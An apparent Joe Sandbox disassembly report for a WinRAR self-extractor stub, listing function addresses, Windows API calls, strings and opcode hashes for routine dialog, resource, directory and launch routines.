Opcode Fuzzy Hash: 469945c3df918f4ac9347a7c8e9f7e944882380b4926574b273706e04d0c3fbb
Instruction Fuzzy Hash: FA62A16BE0C64387FF10AB21E8503B92369AF85784F500435D84DC7AA6DE3FA519D74B

Function 00007FF6EF6D353C Relevance: 49.9, APIs: 19, Strings: 9, Instructions: 856COMMON

Download Yara Rule

Strings

<br>, xrefs: 00007FF6EF6D3ACA
MIN, xrefs: 00007FF6EF6D372E
%s.%d.tmp, xrefs: 00007FF6EF6D3CEE
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF6EF6D38C0
ProgramFilesDir, xrefs: 00007FF6EF6D38FF
%s%s%u, xrefs: 00007FF6EF6D3DC7
MAX, xrefs: 00007FF6EF6D3715
HIDE, xrefs: 00007FF6EF6D36FC
.lnk, xrefs: 00007FF6EF6D42BF, 00007FF6EF6D42D8

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: EnvironmentExecuteExpandShellStrings
String ID: %s%s%u$%s.%d.tmp$.lnk$<br>$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3420131149-2038501859
Opcode ID: 3b83f4e13dc0a149532fb4b0f17680c2431fb1815338157442d4deddf3c819d2
Instruction ID: 416bbbdb8ad9931a284362dfa271f8975be254486443c81d90078f570c42695d
Opcode Fuzzy Hash: 3b83f4e13dc0a149532fb4b0f17680c2431fb1815338157442d4deddf3c819d2
Instruction Fuzzy Hash: CC826123A1868287EB30AB20D8513F92369FF50784F904436D54DCB5A9DF7FE644EB4A

Function 00007FF6EF6D5334 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EF6C5008: GetModuleHandleW.KERNEL32 ref: 00007FF6EF6C5050
Part of subcall function 00007FF6EF6C5008: GetProcAddress.KERNEL32 ref: 00007FF6EF6C5068
Part of subcall function 00007FF6EF6C5008: GetProcAddress.KERNEL32 ref: 00007FF6EF6C5095

Part of subcall function 00007FF6EF6D0B5C: GetCurrentDirectoryW.KERNEL32 ref: 00007FF6EF6D0B68

Part of subcall function 00007FF6EF6D13A0: OleInitialize.OLE32 ref: 00007FF6EF6D13BA
Part of subcall function 00007FF6EF6D13A0: SHGetMalloc.SHELL32 ref: 00007FF6EF6D1408

GetCommandLineW.KERNEL32 ref: 00007FF6EF6D539B
OpenFileMappingW.KERNEL32 ref: 00007FF6EF6D53D2
MapViewOfFile.KERNEL32 ref: 00007FF6EF6D53F0
UnmapViewOfFile.KERNEL32 ref: 00007FF6EF6D5458

Part of subcall function 00007FF6EF6D4E64: SetEnvironmentVariableW.KERNEL32 ref: 00007FF6EF6D4E92
Part of subcall function 00007FF6EF6D4E64: SetEnvironmentVariableW.KERNELBASE ref: 00007FF6EF6D4ED2

Part of subcall function 00007FF6EF6C37E8: GetProcAddress.KERNEL32 ref: 00007FF6EF6C3846
Part of subcall function 00007FF6EF6C37E8: GetProcAddress.KERNEL32 ref: 00007FF6EF6C3861

CloseHandle.KERNEL32 ref: 00007FF6EF6D5461
GetModuleFileNameW.KERNEL32 ref: 00007FF6EF6D5483
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6EF6D5493
GetLocalTime.KERNEL32 ref: 00007FF6EF6D549D
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D54EE
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6EF6D54FE
GetModuleHandleW.KERNEL32 ref: 00007FF6EF6D5506
LoadIconW.USER32 ref: 00007FF6EF6D5525
DialogBoxParamW.USER32 ref: 00007FF6EF6D5591
Sleep.KERNEL32 ref: 00007FF6EF6D55C4
DeleteObject.GDI32 ref: 00007FF6EF6D5601
DeleteObject.GDI32 ref: 00007FF6EF6D5613
CloseHandle.KERNEL32 ref: 00007FF6EF6D565B

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF6EF6D54DD
winrarsfxmappingfile.tmp, xrefs: 00007FF6EF6D53C7
STARTDLG, xrefs: 00007FF6EF6D5580
sfxname, xrefs: 00007FF6EF6D548C
sfxstime, xrefs: 00007FF6EF6D54F7

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AddressEnvironmentFileHandleProcVariable$Module$CloseDeleteObjectView$CommandCurrentDialogDirectoryIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepTimeUnmapswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1691232531-3710569615
Opcode ID: 62ccf693bea90dd8faf23712a3662db8c7ca790b9ebf779ec010995198d30e49
Instruction ID: da0249d26ff5168c5ae3d596a11d02cad68de0070a9a82689fb7d1c161911426
Opcode Fuzzy Hash: 62ccf693bea90dd8faf23712a3662db8c7ca790b9ebf779ec010995198d30e49
Instruction Fuzzy Hash: EAA16D27A1864287FB50EB20E8543B933A9BF84744F500035E94DC7AA5DF3FE519EB4A

Function 00007FF6EF6C2550 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C25A8

Part of subcall function 00007FF6EF6C6948: WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6C6979

SetDlgItemTextW.USER32 ref: 00007FF6EF6C2617
GetWindowRect.USER32 ref: 00007FF6EF6C2651
GetClientRect.USER32 ref: 00007FF6EF6C265F
GetWindowLongPtrW.USER32 ref: 00007FF6EF6C2710
GetWindowRect.USER32 ref: 00007FF6EF6C2756
SetWindowTextW.USER32 ref: 00007FF6EF6C2790
GetSystemMetrics.USER32 ref: 00007FF6EF6C279B
GetWindow.USER32 ref: 00007FF6EF6C27AC
GetWindowRect.USER32 ref: 00007FF6EF6C27EA
GetWindow.USER32 ref: 00007FF6EF6C28AC

Strings

CAPTION, xrefs: 00007FF6EF6C2773
$%s:, xrefs: 00007FF6EF6C2593

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 2100155373-404845831
Opcode ID: 66fafb6747b2519cb4a08f55def08290f9512f8099f1da877605a45cd61ed12f
Instruction ID: dd5c12931383bea5de989a99a1da20f092a3cff22c3777101f94b63e8ad4f360
Opcode Fuzzy Hash: 66fafb6747b2519cb4a08f55def08290f9512f8099f1da877605a45cd61ed12f
Instruction Fuzzy Hash: 5191F677B1864287EB14DF29E84076A67A5FBC4B84F505135EE8D87B98CF3EE8058B00

Function 00007FF6EF6D0C0C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32 ref: 00007FF6EF6D0C25
SizeofResource.KERNEL32 ref: 00007FF6EF6D0C41
LoadResource.KERNEL32 ref: 00007FF6EF6D0C5B
LockResource.KERNEL32 ref: 00007FF6EF6D0C6D
GlobalAlloc.KERNELBASE ref: 00007FF6EF6D0C8E
GlobalLock.KERNEL32 ref: 00007FF6EF6D0CA3
CreateStreamOnHGlobal.COMBASE ref: 00007FF6EF6D0CD0
GdipAlloc.GDIPLUS ref: 00007FF6EF6D0CE6
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6EF6D0D51
GlobalUnlock.KERNEL32 ref: 00007FF6EF6D0D74
GlobalFree.KERNEL32 ref: 00007FF6EF6D0D7D

Strings

PNG, xrefs: 00007FF6EF6D0C17

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 6b298fa5a1b118b59a46482d0601480174dd81c34f5ca8c079f7314dfa3cdfcd
Instruction ID: d3dd11e884173965feaf6fd4fe6860331e8ea475e5ffb7dc717762c78b370aa2
Opcode Fuzzy Hash: 6b298fa5a1b118b59a46482d0601480174dd81c34f5ca8c079f7314dfa3cdfcd
Instruction Fuzzy Hash: EC416D27A09B0283EF04AB55E85437963A8EF89B94F140536CD0D87368EF7FE449DB06

Function 00007FF6EF6D15BC Relevance: 16.6, APIs: 11, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6EF6D15E8
OpenProcessToken.ADVAPI32 ref: 00007FF6EF6D15FB
GetTokenInformation.ADVAPI32 ref: 00007FF6EF6D162A
GetLastError.KERNEL32 ref: 00007FF6EF6D1634
GetTokenInformation.ADVAPI32 ref: 00007FF6EF6D1669
CopySid.ADVAPI32 ref: 00007FF6EF6D168C
SetEntriesInAclW.ADVAPI32 ref: 00007FF6EF6D16E0
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF6EF6D16F1
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF6EF6D170A
CreateDirectoryW.KERNELBASE ref: 00007FF6EF6D1732
LocalFree.KERNEL32 ref: 00007FF6EF6D1742

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
String ID:
API String ID: 2740647886-0
Opcode ID: ce400f2da4878de5fb046944169b934d3693131bb16abb635702ab8aecb66311
Instruction ID: 72d92e946058cad23a6117279e010061f896be575005e5dbedca599fc7afdbd7
Opcode Fuzzy Hash: ce400f2da4878de5fb046944169b934d3693131bb16abb635702ab8aecb66311
Instruction Fuzzy Hash: 70416D33618B8287FB509F61E8447AA73B8FB88B84F500135EA4E97A58DF3ED505DB05

Function 00007FF6EF6B42C4 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 610
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMT, xrefs: 00007FF6EF6B4B82
h%u, xrefs: 00007FF6EF6B4818
hc%u, xrefs: 00007FF6EF6B4870

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID: CMT$h%u$hc%u
API String ID: 0-3282847064
Opcode ID: 4165458ec45c8294c4d0096412a23894492d67378c37ba53c30bd610185e02d7
Instruction ID: 34f5d7cf6f43188f63418e00036564dafaf77af1c12a9a04d2e2d10287d5486a
Opcode Fuzzy Hash: 4165458ec45c8294c4d0096412a23894492d67378c37ba53c30bd610185e02d7
Instruction Fuzzy Hash: 0D52D133A08686A7EB08DF31C1513F967A9FB51788F444436EB4D8728ADF3AE524D706

Function 00007FF6EF6BDDB0 Relevance: 7.6, APIs: 5, Instructions: 97fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,00007FF6EF6BDC57), ref: 00007FF6EF6BDDFA
FindFirstFileW.KERNEL32 ref: 00007FF6EF6BDE2B
GetLastError.KERNEL32 ref: 00007FF6EF6BDE3A
FindNextFileW.KERNEL32(?,?,?,?,?,00007FF6EF6BDC57), ref: 00007FF6EF6BDE61
GetLastError.KERNEL32 ref: 00007FF6EF6BDE6F

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: c7a9b75149be672fc0ded2493ed5d3015ede7f253c901e6da451452993f7ec22
Instruction ID: ac06528566ef8b12c3fc711a77ea1348a515b143001c208ddadc671ac3c01038
Opcode Fuzzy Hash: c7a9b75149be672fc0ded2493ed5d3015ede7f253c901e6da451452993f7ec22
Instruction Fuzzy Hash: 3F41B133A0868197DA249B24E5403E863A4FB497B4F000731EB7D877C9DF2EE255D705

Function 00007FF6EF6BADE8 Relevance: 2.2, Strings: 1, Instructions: 988COMMON

Download Yara Rule

Strings

__tmp_reference_source_, xrefs: 00007FF6EF6BB0D8

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID: __tmp_reference_source_
API String ID: 0-685763994
Opcode ID: d5c5111bd055846a360c4929355d7de54487030d753ae5b9ba6c45da8ec5d2b6
Instruction ID: 2bb17c4532f04ed316834ecbfdebc874b14c29c3299b5e3fb24376677178fb36
Opcode Fuzzy Hash: d5c5111bd055846a360c4929355d7de54487030d753ae5b9ba6c45da8ec5d2b6
Instruction Fuzzy Hash: 2CA2F663A0C6C287EB60CB21E4543FE67A9FB41748F444436EB8D8769ACE3EE505E305

Function 00007FF6EF6D61D0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EF6D5E2C: DloadProtectSection.DELAYIMP ref: 00007FF6EF6D5E9D

RaiseException.KERNEL32 ref: 00007FF6EF6D6277
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF6EF6D6263

Part of subcall function 00007FF6EF6D613C: DloadProtectSection.DELAYIMP ref: 00007FF6EF6D619B

LoadLibraryExA.KERNELBASE ref: 00007FF6EF6D6316
GetLastError.KERNEL32 ref: 00007FF6EF6D6324
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF6EF6D6356
RaiseException.KERNEL32 ref: 00007FF6EF6D636A

Strings

H, xrefs: 00007FF6EF6D6244

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: 5825db9d11c9886576c81ba2324aa96053477cb978010f585f34799421a7af15
Instruction ID: 2aadfd7a6ce091fc45a571aa88d0e3490d941ad5ba2d14804326a3331f5d40c6
Opcode Fuzzy Hash: 5825db9d11c9886576c81ba2324aa96053477cb978010f585f34799421a7af15
Instruction Fuzzy Hash: 0B914733A05B128BEB40DF65D8407A833A9BB08B88F154539DE0D87B54EF7BE545DB09

Function 00007FF6EF6C1ADC Relevance: 21.6, APIs: 2, Strings: 10, Instructions: 560
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6C1ABA), ref: 00007FF6EF6C1B3B

Part of subcall function 00007FF6EF6C66A4: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6EF6BF60B,?,00000001,?,00007FF6EF6C6676), ref: 00007FF6EF6C66D1

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C202E

Strings

MENU, xrefs: 00007FF6EF6C1E92
,, xrefs: 00007FF6EF6C2063
$%s:, xrefs: 00007FF6EF6C2006
*messages***, xrefs: 00007FF6EF6C1C77
DIRECTION, xrefs: 00007FF6EF6C1EA0
STRINGS, xrefs: 00007FF6EF6C1E76
DIALOG, xrefs: 00007FF6EF6C1E84
*messages***, xrefs: 00007FF6EF6C1CB6
RTL, xrefs: 00007FF6EF6C1FE2
@%s:, xrefs: 00007FF6EF6C200D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharFileModuleMultiNameWide_snwprintf
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 2679931996-2291855099
Opcode ID: 5591824866574204440d77b796e6eefe9961957d05c33bfa7f6b11432d841042
Instruction ID: 97659d09149014f335b9653f2fa41a2cb831e591dd89eb3d355a4b9e5c4fdeb2
Opcode Fuzzy Hash: 5591824866574204440d77b796e6eefe9961957d05c33bfa7f6b11432d841042
Instruction Fuzzy Hash: 3E428023A1868297EF20DF15C4447F92369FF54784F804132DA8DCBA95EF2EE645E34A

Function 00007FF6EF6D4944 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF6EF6D4AD2
IsWindowVisible.USER32 ref: 00007FF6EF6D4B02
ShowWindow.USER32 ref: 00007FF6EF6D4B11
WaitForInputIdle.USER32 ref: 00007FF6EF6D4B23
GetExitCodeProcess.KERNEL32 ref: 00007FF6EF6D4B49
CloseHandle.KERNEL32(00000000,00000000,00000001,00000000,?,00007FF6EF6D43E2,00000000,?,00000000,00000000,?,00000001,?,00007FF6EF6D2DB7), ref: 00007FF6EF6D4B73
ShowWindow.USER32 ref: 00007FF6EF6D4BCC

Strings

.exe, xrefs: 00007FF6EF6D4B7E
.inf, xrefs: 00007FF6EF6D4A7F
p, xrefs: 00007FF6EF6D49B7
Install, xrefs: 00007FF6EF6D4A90

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait
String ID: .exe$.inf$Install$p
API String ID: 3163361234-3607691742
Opcode ID: d36a91afd6d15a032926df9198ee9a1ea810291e456789a04b998a5fb47a0abd
Instruction ID: 4ad7b4a401e8ad2da3036452d6c9d8d2c0669cd3c29e1c8f5afa305f8a03ddca
Opcode Fuzzy Hash: d36a91afd6d15a032926df9198ee9a1ea810291e456789a04b998a5fb47a0abd
Instruction Fuzzy Hash: B671B223A0964247EB64AF15E8503B933A8EF94744F648035D94EC7698DF3FE854DB0B

Function 00007FF6EF6D4568 Relevance: 16.6, APIs: 11, Instructions: 99
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EF6D2090: PeekMessageW.USER32 ref: 00007FF6EF6D20A6
Part of subcall function 00007FF6EF6D2090: GetMessageW.USER32 ref: 00007FF6EF6D20BD
Part of subcall function 00007FF6EF6D2090: IsDialogMessageW.USER32 ref: 00007FF6EF6D20D4
Part of subcall function 00007FF6EF6D2090: TranslateMessage.USER32 ref: 00007FF6EF6D20E3
Part of subcall function 00007FF6EF6D2090: DispatchMessageW.USER32 ref: 00007FF6EF6D20EE

GetDlgItem.USER32 ref: 00007FF6EF6D45A7
ShowWindow.USER32 ref: 00007FF6EF6D45CD
SendMessageW.USER32 ref: 00007FF6EF6D45E2
SendMessageW.USER32 ref: 00007FF6EF6D45FA
SendMessageW.USER32 ref: 00007FF6EF6D461B
SendMessageW.USER32 ref: 00007FF6EF6D4637
SendMessageW.USER32 ref: 00007FF6EF6D467A
SendMessageW.USER32 ref: 00007FF6EF6D468E
SendMessageW.USER32 ref: 00007FF6EF6D46A2
SendMessageW.USER32 ref: 00007FF6EF6D46CC
SendMessageW.USER32 ref: 00007FF6EF6D46E4

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
